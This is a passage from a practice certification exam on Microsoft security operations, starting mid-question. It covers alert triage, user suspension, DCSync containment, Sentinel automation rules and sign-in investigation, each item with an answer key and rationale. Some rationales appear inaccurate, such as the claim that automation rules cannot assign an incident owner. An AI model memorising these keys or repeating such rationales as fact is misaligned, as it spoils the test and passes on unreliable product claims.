B. Immediately apply the latest security patches to the VM using Azure Update Manager.
C. Isolate the VM from the network by applying a network security group rule.
D. Review the alert details in Microsoft Defender for Cloud to identify the vulnerability and follow the remediation steps.
Answer: D

Alert details provide actionable information for validation and remediation.

Why this answer

Option D is correct because the alert includes the affected resources and remediation steps. Option B is wrong because applying a patch without validation may cause downtime. Option C is wrong because isolating the VM from the network is a containment step but not validation.

Option A is wrong because contacting support is not an immediate action.

222
MCQ · easy

Your SOC uses Microsoft Defender for Cloud Apps. An alert indicates that a user is downloading a large number of files from SharePoint. Which action should you take to investigate and potentially block the activity?

A. Create a Conditional Access policy to block the user
B. Block the IP address in Azure Firewall
C. Use Microsoft Intune to wipe the user's device
D. Suspend the user in Defender for Cloud Apps
Answer: D

Governance actions like suspend immediately stop the activity.

Why this answer

Option D is correct because Defender for Cloud Apps allows you to govern the user by suspending them or blocking the app. Option A is wrong because Azure AD Conditional Access policies are applied at authentication, not during an active session. Option C is wrong because Intune manages devices, not user access to cloud apps.

Option B is wrong because blocking the IP may affect other users.

223
MCQ · hard

Your organization uses Microsoft Sentinel and Microsoft Defender for Identity. An alert fires for a potential DCSync attack. The incident response team needs to immediately block the source account from performing directory replication. Which action should be taken?

A. Use Microsoft Defender for Identity to disable the account.
B. Reset the account password and enforce a sign-out.
C. Disable the account in Microsoft Entra ID (if synced) or Active Directory.
D. Remove the account from the Domain Admins group.
Answer: C

Disabling the account immediately revokes access and prevents further authentication.

Why this answer

Option C is correct because disabling the account in Microsoft Entra ID (formerly Azure AD) or Active Directory is the quickest way to stop the account from performing any actions, including DCSync. Option D is wrong because removing the account from Domain Admins does not remove the 'Replicate Directory Changes' permission if it was delegated directly. Option B is wrong because resetting the password does not terminate existing sessions immediately.

Option A is wrong because the Microsoft Defender for Identity alert provides details but does not directly block the account.

224
Multi-Select · medium

Which TWO actions can be performed using Microsoft Sentinel's automation rules? (Choose two.)

Select 2 answers
A. Block an IP address in Azure Firewall.
B. Change the severity of an incident.
C. Assign a user to an incident owner.
D. Trigger a playbook.
E. Run a KQL query against a Log Analytics workspace.
Answers: B, D

Automation rules can modify incident properties including severity.

Why this answer

Options B and D are correct. Automation rules can trigger playbooks and change incident severity. Option A is wrong because automation rules cannot directly block IP addresses; that requires a playbook.

Option E is wrong because automation rules run on incidents, not on queries. Option C is wrong because automation rules do not manage user permissions.

225
Multi-Select · easy

A security analyst detects a suspicious login from an unusual location for a user in Microsoft Defender XDR. The analyst needs to investigate and contain the incident. Which TWO actions should be taken?

Select 2 answers
A. Disable the user account from Microsoft Entra ID.
B. Create a custom hunting query in Microsoft 365 Defender advanced hunting.
C. Review the user's sign-in logs and risk level in Microsoft Entra ID Identity Protection.
D. Run an automated investigation playbook.
E. Reset the user's password.
Answers: A, C

Disabling the account immediately stops further access.

Why this answer

Disabling the user account (A) immediately stops further access. Using Microsoft Entra ID Identity Protection to confirm the risk level (C) provides additional context. Investigation playbooks (D) are for automation, not immediate containment.

Resetting the password (E) is less immediate than disabling the account. Hunting queries (B) are for proactive threat hunting.
